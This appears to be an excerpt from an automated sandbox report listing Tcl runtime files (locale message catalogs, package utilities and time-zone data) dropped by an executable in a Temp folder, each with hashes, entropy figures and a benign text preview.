                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/loadICU.tcl -- do not edit.namespace eval ::tcl::clock {. ::msgcat::mcset zh DAYS_OF_WEEK_ABBREV [list \. "\u661f\u671f\u65e5"\. "\u661f\u671f\u4e00"\. "\u661f\u671f\u4e8c"\. "\u661f\u671f\u4e09"\. "\u661f\u671f\u56db"\. "\u661f\u671f\u4e94"\. "\u661f\u671f\u516d"]. ::msgcat::mcset zh DAYS_OF_WEEK_FULL [list \. "\u661f\u671f\u65e5"\. "\u661f\u671f\u4e00"\. "\u661f\u671f\u4e8c"\. "\u661f\u671f\u4e09"\. "\u661f\u671f\u56db"\. "\u661f\u671f\u4e94"\. "\u661f\u671f\u516d"]. ::msgcat::mcset zh MONTHS_ABBREV [list \. "\u4e00\u6708"\. "\u4e8c\u6708"\. "\u4e09\u6708"\. "\u56db\u6708"\. "\u4e94\u6708"\. "\u516d\u6708"\. "\u4e03\u6708"\. "\u516b\u6708"\. "\u4e5d\u6708"\. "\u5341\u6708"\. "\u5341\u4e00\u6708"\. "\u5341\u4e8c\u6708"\. ""]. ::msgcat::mcset zh MONTHS_FULL [list \.
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):312
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):5.1281364096481665
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:6:SlSyEtJLlpuoo6dmoX5HoHJ+3vtfNrFLoHJ+3v6MY+oXa+3vYq9:4EnLzu8d5eJ+3vtNEJ+3v6L1L3vYq9
                                                                                                                                                                                                                                                                                                                                MD5:EB94B41551EAAFFA5DF4F406C7ACA3A4
                                                                                                                                                                                                                                                                                                                                SHA1:B0553108BDE43AA7ED362E2BFFAF1ABCA1567491
                                                                                                                                                                                                                                                                                                                                SHA-256:85F91CF6E316774AA5D0C1ECA85C88E591FD537165BB79929C5E6A1CA99E56C8
                                                                                                                                                                                                                                                                                                                                SHA-512:A0980A6F1AD9236647E4F18CC104999DB2C523153E8716FD0CFE57320E906DF80378A5C0CDE132F2C53F160F5304EAF34910D7D1BB5753987D74AFBC0B6F75F3
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/loadICU.tcl -- do not edit.namespace eval ::tcl::clock {. ::msgcat::mcset zh_CN DATE_FORMAT "%Y-%m-%e". ::msgcat::mcset zh_CN TIME_FORMAT "%k:%M:%S". ::msgcat::mcset zh_CN TIME_FORMAT_12 "%P%I\u65f6%M\u5206%S\u79d2". ::msgcat::mcset zh_CN DATE_TIME_FORMAT "%Y-%m-%e %k:%M:%S %z".}.
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):752
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.660158381384211
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:12:4EnLzu8qmDBHZLX+TyW4OU5yPgM9Lz+SC3WwLNMW3v6G3v3Ww+:4azu8qyFOw3WwLrvTv3Ww+
                                                                                                                                                                                                                                                                                                                                MD5:D8C6BFBFCE44B6A8A038BA44CB3DB550
                                                                                                                                                                                                                                                                                                                                SHA1:FBD609576E65B56EDA67FD8A1801A27B43DB5486
                                                                                                                                                                                                                                                                                                                                SHA-256:D123E0B4C2614F680808B58CCA0C140BA187494B2C8BCF8C604C7EB739C70882
                                                                                                                                                                                                                                                                                                                                SHA-512:3455145CF5C77FC847909AB1A283452D0C877158616C8AA7BDFFC141B86B2E66F9FF45C3BB6A4A9D758D2F8FFCB1FE919477C4553EFE527C0EDC912EBBCAABCD
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/loadICU.tcl -- do not edit.namespace eval ::tcl::clock {. ::msgcat::mcset zh_HK DAYS_OF_WEEK_ABBREV [list \. "\u65e5"\. "\u4e00"\. "\u4e8c"\. "\u4e09"\. "\u56db"\. "\u4e94"\. "\u516d"]. ::msgcat::mcset zh_HK MONTHS_ABBREV [list \. "1\u6708"\. "2\u6708"\. "3\u6708"\. "4\u6708"\. "5\u6708"\. "6\u6708"\. "7\u6708"\. "8\u6708"\. "9\u6708"\. "10\u6708"\. "11\u6708"\. "12\u6708"\. ""]. ::msgcat::mcset zh_HK DATE_FORMAT "%Y\u5e74%m\u6708%e\u65e5". ::msgcat::mcset zh_HK TIME_FORMAT_12 "%P%I:%M:%S". ::msgcat::mcset zh_HK DATE_TIME_FORMAT "%Y\u5e74%m\u6708%e\u65e5 %P%I:%M:%S %z".}.
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):339
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):5.020358587042703
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:6:SlSyEtJLlpuoo6dmoOpxoPpSocvNLohX3v6ZhLoh+3v6fJ:4EnLzu8WvNo3v6b3vu
                                                                                                                                                                                                                                                                                                                                MD5:E0BC93B8F050D6D80B8173FF4FA4D7B7
                                                                                                                                                                                                                                                                                                                                SHA1:231FF1B6F859D0261F15D2422DF09E756CE50CCB
                                                                                                                                                                                                                                                                                                                                SHA-256:2683517766AF9DA0D87B7A862DE9ADEA82D9A1454FC773A9E3C1A6D92ABA947A
                                                                                                                                                                                                                                                                                                                                SHA-512:8BA6EAC5F71167B83A58B47123ACF7939C348FE2A0CA2F092FE9F60C0CCFB901ADA0E8F2101C282C39BAE86C918390985731A8F66E481F8074732C37CD50727F
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/loadICU.tcl -- do not edit.namespace eval ::tcl::clock {. ::msgcat::mcset zh_SG AM "\u4e0a\u5348". ::msgcat::mcset zh_SG PM "\u4e2d\u5348". ::msgcat::mcset zh_SG DATE_FORMAT "%d %B %Y". ::msgcat::mcset zh_SG TIME_FORMAT_12 "%P %I:%M:%S". ::msgcat::mcset zh_SG DATE_TIME_FORMAT "%d %B %Y %P %I:%M:%S %z".}.
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):346
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):5.08314435797197
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:6:SlSyEtJLlpuoo6dmoAykaRULH/XRxvBoAyjZRULH5oAyU/G0OZoAyxW3v6ZhLoAR:4EnLzu8I5xEOKRWW3v6w3v8AC
                                                                                                                                                                                                                                                                                                                                MD5:9CD17E7F28186E0E71932CC241D1CBB1
                                                                                                                                                                                                                                                                                                                                SHA1:AF1EE536AABB8198BA88D3474ED49F76A37E89FF
                                                                                                                                                                                                                                                                                                                                SHA-256:D582406C51A3DB1EADF6507C50A1F85740FDA7DA8E27FC1438FEB6242900CB12
                                                                                                                                                                                                                                                                                                                                SHA-512:4712DD6A27A09EA339615FC3D17BC8E4CD64FF12B2B8012E01FD4D3E7789263899FA05EDDB77044DC7B7D32B3DC55A52B8320D93499DF9A6799A8E4D07174525
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/loadICU.tcl -- do not edit.namespace eval ::tcl::clock {. ::msgcat::mcset zh_TW BCE "\u6c11\u570b\u524d". ::msgcat::mcset zh_TW CE "\u6c11\u570b". ::msgcat::mcset zh_TW DATE_FORMAT "%Y/%m/%e". ::msgcat::mcset zh_TW TIME_FORMAT_12 "%P %I:%M:%S". ::msgcat::mcset zh_TW DATE_TIME_FORMAT "%Y/%m/%e %P %I:%M:%S %z".}.
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:Tcl script, ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):32718
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.5415166585248645
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:768:UczgW5gzrui4sKDt9C7sGbHMmjJbuQH8A2Q:VgTrrvf7sGbHDFSQH8/Q
                                                                                                                                                                                                                                                                                                                                MD5:1A7DF33BC47D63F9CE1D4FF70A974FA3
                                                                                                                                                                                                                                                                                                                                SHA1:513EC2215E2124D9A6F6DF2549C1442109E117C0
                                                                                                                                                                                                                                                                                                                                SHA-256:C5D74E1C927540A3F524E6B929D0956EFBA0797FB8D55918EF69D27DF57DEDA3
                                                                                                                                                                                                                                                                                                                                SHA-512:F671D5A46382EDFBDA49A6EDB9E6CF2D5CEBD83CE4ADD6B717A478D52748332D41DA3743182D4555B801B96A318D29DFC6AC36B32983ADB32D329C24F8A3D713
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# optparse.tcl --.#.# (private) Option parsing package.# Primarily used internally by the safe:: code..#.#.WARNING: This code will go away in a future release.#.of Tcl. It is NOT supported and you should not rely.#.on it. If your code does rely on this package you.#.may directly incorporate this code into your application...package require Tcl 8.2.# When this version number changes, update the pkgIndex.tcl file.# and the install directory in the Makefiles..package provide opt 0.4.6..namespace eval ::tcl {.. # Exported APIs. namespace export OptKeyRegister OptKeyDelete OptKeyError OptKeyParse \. OptProc OptProcArgGiven OptParse \.. Lempty Lget \. Lassign Lvarpop Lvarpop1 Lvarset Lvarincr \. SetMax SetMin...################# Example of use / 'user documentation' ###################.. proc OptCreateTestProc {} {...# Defines ::tcl::OptParseTest as a test proc with parsed arguments..# (can't be defined before the code below is
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):607
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.652658850873767
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:12:jHxJRuMopS42wyGlTajUA43KXks4L1GbyvX6VxQ+pBbX:bvRmS42wyGlTah9XkbL7X6VxBB
                                                                                                                                                                                                                                                                                                                                MD5:92FF1E42CFC5FECCE95068FC38D995B3
                                                                                                                                                                                                                                                                                                                                SHA1:B2E71842F14D5422A9093115D52F19BCCA1BF881
                                                                                                                                                                                                                                                                                                                                SHA-256:EB9925A8F0FCC7C2A1113968AB0537180E10C9187B139C8371ADF821C7B56718
                                                                                                                                                                                                                                                                                                                                SHA-512:608D436395D055C5449A53208F3869B8793DF267B8476AD31BCDD9659A222797814832720C495D938E34BF7D253FFC3F01A73CC0399C0DFB9C85D2789C7F11C0
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# Tcl package index file, version 1.1.# This file is generated by the "pkg_mkIndex -direct" command.# and sourced either when an application starts up or.# by a "package unknown" script. It invokes the.# "package ifneeded" command to set up package-related.# information so that packages will be loaded automatically.# in response to "package require" commands. When this.# script is sourced, the variable $dir must contain the.# full path name of this file's directory...if {![package vsatisfies [package provide Tcl] 8.2]} {return}.package ifneeded opt 0.4.6 [list source [file join $dir optparse.tcl]].
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):22959
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.836555290409911
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:384:I72oQXm9jcLyBLWueSzvAXMiow90l3NhETrh4NLTluYhoNL3ZAqYi:I72oQXmgyBCqvAcFw2dhOrh4NZVhoN3F
                                                                                                                                                                                                                                                                                                                                MD5:55E2DB5DCF8D49F8CD5B7D64FEA640C7
                                                                                                                                                                                                                                                                                                                                SHA1:8FDC28822B0CC08FA3569A14A8C96EDCA03BFBBD
                                                                                                                                                                                                                                                                                                                                SHA-256:47B6AF117199B1511F6103EC966A58E2FD41F0ABA775C44692B2069F6ED10BAD
                                                                                                                                                                                                                                                                                                                                SHA-512:824C210106DE7EAE57A480E3F6E3A5C8FB8AC4BBF0A0A386D576D3EB2A3AC849BDFE638428184056DA9E81767E2B63EFF8E18068A1CF5149C9F8A018F817D3E5
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# package.tcl --.#.# utility procs formerly in init.tcl which can be loaded on demand.# for package management..#.# Copyright (c) 1991-1993 The Regents of the University of California..# Copyright (c) 1994-1998 Sun Microsystems, Inc..#.# See the file "license.terms" for information on usage and redistribution.# of this file, and for a DISCLAIMER OF ALL WARRANTIES..#..namespace eval tcl::Pkg {}..# ::tcl::Pkg::CompareExtension --.#.# Used internally by pkg_mkIndex to compare the extension of a file to a given.# extension. On Windows, it uses a case-insensitive comparison because the.# file system can be file insensitive..#.# Arguments:.# fileName.name of a file whose extension is compared.# ext..(optional) The extension to compare against; you must.#..provide the starting dot..#..Defaults to [info sharedlibextension].#.# Results:.# Returns 1 if the extension matches, 0 otherwise..proc tcl::Pkg::CompareExtension {fileName {ext {}}} {. global tcl_platform. if {$ext eq ""} {set ext
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):816
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.833285375693491
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:12:TcS2n1RBbgZKaNHaeYFSxYmXqt9IGUafZwXgEImK7k35IpbdELS8/McjbPgnE:TcHn5sZKGkwa/JxfJmRGNc93j7CE
                                                                                                                                                                                                                                                                                                                                MD5:FCDAF75995F2CCE0A5D5943E9585590D
                                                                                                                                                                                                                                                                                                                                SHA1:A0B1BD4E68DCE1768D3C5E0D3C7B31E28021D3BA
                                                                                                                                                                                                                                                                                                                                SHA-256:EBE5A2B4CBBCD7FD3F7A6F76D68D7856301DB01B350C040942A7B806A46E0014
                                                                                                                                                                                                                                                                                                                                SHA-512:A632D0169EE3B6E6B7EF73F5FBA4B7897F9491BDB389D78165E297252424546EFB43895D3DD530864B9FCF2ECF5BCE7DA8E55BA5B4F20E23E1E45ADDAF941C11
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# parray:.# Print the contents of a global array on stdout..#.# Copyright (c) 1991-1993 The Regents of the University of California..# Copyright (c) 1994 Sun Microsystems, Inc..#.# See the file "license.terms" for information on usage and redistribution.# of this file, and for a DISCLAIMER OF ALL WARRANTIES..#..proc parray {a {pattern *}} {. upvar 1 $a array. if {![array exists array]} {..return -code error "\"$a\" isn't an array". }. set maxl 0. set names [lsort [array names array $pattern]]. foreach name $names {..if {[string length $name] > $maxl} {.. set maxl [string length $name]..}. }. set maxl [expr {$maxl + [string length $a] + 2}]. foreach name $names {..set nameString [format %s(%s) $a $name]..puts stdout [format "%-*s = %s" $maxl $nameString $array($name)]. }.}.
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:Tcl script, ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):33439
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.750571844372246
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:768:OovFcXxzYqZ1//L2J4lb77BvnthiV0EnoQI4MnNhGQmzY3wKIYkA:OovFcqqZF2J4lb7Rrg0EnoQI4INhGrzu
                                                                                                                                                                                                                                                                                                                                MD5:325A573F30C9EA70FD891E85664E662C
                                                                                                                                                                                                                                                                                                                                SHA1:6EC3F21EBCFD269847C43891DAD96189FACF20E4
                                                                                                                                                                                                                                                                                                                                SHA-256:89B74D2417EB27FEEA32B8666B08D28BC1FFE5DCF1652DBD8799F7555D79C71F
                                                                                                                                                                                                                                                                                                                                SHA-512:149FE725A3234A2F8C3EE1B03119440E3CB16586F04451B6E62CED0097B1AD227C97B55F5A66631033A888E860AB61CAF7DDD014696276BC9226D87F15164E2F
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# safe.tcl --.#.# This file provide a safe loading/sourcing mechanism for safe interpreters..# It implements a virtual path mecanism to hide the real pathnames from the.# slave. It runs in a master interpreter and sets up data structure and.# aliases that will be invoked when used from a slave interpreter..#.# See the safe.n man page for details..#.# Copyright (c) 1996-1997 Sun Microsystems, Inc..#.# See the file "license.terms" for information on usage and redistribution of.# this file, and for a DISCLAIMER OF ALL WARRANTIES...#.# The implementation is based on namespaces. These naming conventions are.# followed:.# Private procs starts with uppercase..# Public procs are exported and starts with lowercase.#..# Needed utilities package.package require opt 0.4.1..# Create the safe namespace.namespace eval ::safe {. # Exported API:. namespace export interpCreate interpInit interpConfigure interpDelete \..interpAddToAccessPath interpFindInAccessPath setLogCmd.}..# Helper function to
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):5415
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.701682771925196
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:96:esataNULULUVUhU5U1UIUZUJeUpgURUFD15Q0AkU6PkrBkGUjZKspDzmK5SMFTub:eNtEACkiwM3g4ePOiD15Q0AkU6PkrBko
                                                                                                                                                                                                                                                                                                                                MD5:E127196E9174B429CC09C040158F6AAB
                                                                                                                                                                                                                                                                                                                                SHA1:FF850F5D1BD8EFC1A8CB765FE8221330F0C6C699
                                                                                                                                                                                                                                                                                                                                SHA-256:ABF7D9D1E86DE931096C21820BFA4FD70DB1F55005D2DB4AA674D86200867806
                                                                                                                                                                                                                                                                                                                                SHA-512:C4B98EBC65E25DF41E6B9A93E16E608CF309FA0AE712578EE4974D84F7F33BCF2A6ED7626E88A343350E13DA0C5C1A88E24A87FCBD44F7DA5983BB3EF036A162
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# Tcl autoload index file, version 2.0.# -*- tcl -*-.# This file is generated by the "auto_mkindex" command.# and sourced to set up indexing information for one or.# more commands. Typically each line is a command that.# sets an element in the auto_index array, where the.# element name is the name of a command and the value is.# a script that loads the command...set auto_index(auto_reset) [list source [file join $dir auto.tcl]].set auto_index(tcl_findLibrary) [list source [file join $dir auto.tcl]].set auto_index(auto_mkindex) [list source [file join $dir auto.tcl]].set auto_index(auto_mkindex_old) [list source [file join $dir auto.tcl]].set auto_index(::auto_mkindex_parser::init) [list source [file join $dir auto.tcl]].set auto_index(::auto_mkindex_parser::cleanup) [list source [file join $dir auto.tcl]].set auto_index(::auto_mkindex_parser::mkindex) [list source [file join $dir auto.tcl]].set auto_index(::auto_mkindex_parser::hook) [list source [file join $dir auto.tcl]].set auto_in
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):11633
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.706526847377957
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:192:CnjVD6gOGFpvXKPrzYkWo55z3ovPvKvaWZPZ9W6TV9ujpZw7K3mQ4auPltqQvu9:CGQvX+XYkn59YvPSvDJTV9174zuPltBC
                                                                                                                                                                                                                                                                                                                                MD5:F9ED2096EEA0F998C6701DB8309F95A6
                                                                                                                                                                                                                                                                                                                                SHA1:BCDB4F7E3DB3E2D78D25ED4E9231297465B45DB8
                                                                                                                                                                                                                                                                                                                                SHA-256:6437BD7040206D3F2DB734FA482B6E79C68BCC950FBA80C544C7F390BA158F9B
                                                                                                                                                                                                                                                                                                                                SHA-512:E4FB8F28DC72EA913F79CEDF5776788A0310608236D6607ADC441E7F3036D589FD2B31C446C187EF5827FD37DCAA26D9E94D802513E3BF3300E94DD939695B30
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# -*- tcl -*-.#.# Searching for Tcl Modules. Defines a procedure, declares it as the primary.# command for finding packages, however also uses the former 'package unknown'.# command as a fallback..#.# Locates all possible packages in a directory via a less restricted glob. The.# targeted directory is derived from the name of the requested package, i.e..# the TM scan will look only at directories which can contain the requested.# package. It will register all packages it found in the directory so that.# future requests have a higher chance of being fulfilled by the ifneeded.# database without having to come to us again..#.# We do not remember where we have been and simply rescan targeted directories.# when invoked again. The reasoning is this:.#.# - The only way we get back to the same directory is if someone is trying to.# [package require] something that wasn't there on the first scan..#.# Either.# 1) It is there now: If we rescan, you get it; if not you don't..#.# This co
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):141
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.951583909886815
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:3:SlEVFRKvJT8QFx52DcsG/kXGm2OHnFvpsYvUdSalHFLd:SlSWB9X52DBGTm2OHnFvmYValHf
                                                                                                                                                                                                                                                                                                                                MD5:6FB79707FD3A183F8A3C780CA2669D27
                                                                                                                                                                                                                                                                                                                                SHA1:E703AB552B4231827ACD7872364C36C70988E4C0
                                                                                                                                                                                                                                                                                                                                SHA-256:A5DC7BFB4F569361D438C8CF13A146CC2641A1A884ACF905BB51DA28FF29A900
                                                                                                                                                                                                                                                                                                                                SHA-512:CDD3AD9AFFD246F4DFC40C1699E368FB2924E73928060B1178D298DCDB11DBD0E88BC10ED2FED265F7F7271AC5CCE14A60D65205084E9249154B8D54C2309E52
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Africa/Abidjan) {. {-9223372036854775808 -968 0 LMT}. {-1830383032 0 0 GMT}.}.
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):1393
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):3.9087586646312253
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:12:MBp52DUsmdHvdDZxdCjFaEu3MEANKSgI3u2VuTSr0l+pU4Y4Y0gK:cQ9elDZxdCwEu3MEANKSgsrVkvY64Y4
                                                                                                                                                                                                                                                                                                                                MD5:FFEDB06126D6DA9F3BECA614428F51E9
                                                                                                                                                                                                                                                                                                                                SHA1:2C549D1CF8636541D42BDC56D8E534A222E4642C
                                                                                                                                                                                                                                                                                                                                SHA-256:567A0AD3D2C9E356A2E38A76AF4D5C4B8D5B950AF7B648A027FE816ACAE455AE
                                                                                                                                                                                                                                                                                                                                SHA-512:E057EA59A47C881C60B2196554C9B24C00CB26345CA7E311B5409F6FBB31EBEDD13C41A4C3B0B68AE8B93F4819158D94610DE795112E77209F391AC31332BA2A
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Africa/Accra) {. {-9223372036854775808 -52 0 LMT}. {-1640995148 0 0 GMT}. {-1556841600 1200 1 GMT}. {-1546388400 0 0 GMT}. {-1525305600 1200 1 GMT}. {-1514852400 0 0 GMT}. {-1493769600 1200 1 GMT}. {-1483316400 0 0 GMT}. {-1462233600 1200 1 GMT}. {-1451780400 0 0 GMT}. {-1430611200 1200 1 GMT}. {-1420158000 0 0 GMT}. {-1399075200 1200 1 GMT}. {-1388622000 0 0 GMT}. {-1367539200 1200 1 GMT}. {-1357086000 0 0 GMT}. {-1336003200 1200 1 GMT}. {-1325550000 0 0 GMT}. {-1304380800 1200 1 GMT}. {-1293927600 0 0 GMT}. {-1272844800 1200 1 GMT}. {-1262391600 0 0 GMT}. {-1241308800 1200 1 GMT}. {-1230855600 0 0 GMT}. {-1209772800 1200 1 GMT}. {-1199319600 0 0 GMT}. {-1178150400 1200 1 GMT}. {-1167697200 0 0 GMT}. {-1146614400 1200 1 GMT}. {-1136161200 0 0 GMT}. {-1115078400 1200 1 GMT}. {-1104625200 0 0 GMT}. {-1083542400 1200 1 GMT}. {-1073
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):184
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.766991307890532
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:3:SlEVFRKvJT8QFCZaMuUyqsVVMMvwVAIgNGExVMSt2DczqIVDcVVMMv:SlSWB9IZaM3y7VcVAIgNTxL2DnaDkr
                                                                                                                                                                                                                                                                                                                                MD5:C203A97FC500E408AC841A6A5B21E14E
                                                                                                                                                                                                                                                                                                                                SHA1:ED4C4AA578A16EB83220F37199460BFE207D2B44
                                                                                                                                                                                                                                                                                                                                SHA-256:3EBC66964609493524809AD0A730FFFF036C38D9AB3770412841F80DFFC717D5
                                                                                                                                                                                                                                                                                                                                SHA-512:2F1A4500F49AFD013BCA70089B1E24748D7E45D41F2C9D3D9AFDCC1778E750FFB020D34F622B071E80F80CC0FEFF080E8ACC1E7A8ABE8AD12C0F1A1DAA937FE5
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Africa/Nairobi)]} {. LoadTimeZoneFile Africa/Nairobi.}.set TZData(:Africa/Addis_Ababa) $TZData(:Africa/Nairobi).
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):1041
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.110061823095588
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:12:MBp52D7AmdHh5PMybVSqSFvvqXFaLSaSxmvWo/fmvCkQ6eW6Xs8QQB1r5Q:cQIefMyb8BF6XFaLSxktf1PW6X4q1K
                                                                                                                                                                                                                                                                                                                                MD5:8221A83520B1D3DE02E886CFB1948DE3
                                                                                                                                                                                                                                                                                                                                SHA1:0806A0898FDE6F5AE502C64515A1345D71B1F7D2
                                                                                                                                                                                                                                                                                                                                SHA-256:5EE3B25676E813D89ED866D03B5C3388567D8307A2A60D1C4A34D938CBADF710
                                                                                                                                                                                                                                                                                                                                SHA-512:2B8A837F7CF6DE43DF4072BF4A54226235DA8B8CA78EF55649C7BF133B2E002C614FE7C693004E3B17C25FBCECAAD5CD9B0A8CB0A5D32ADF68EA019203EE8704
                                                                                                                                                                                                                                                                                                                                Malicious:false
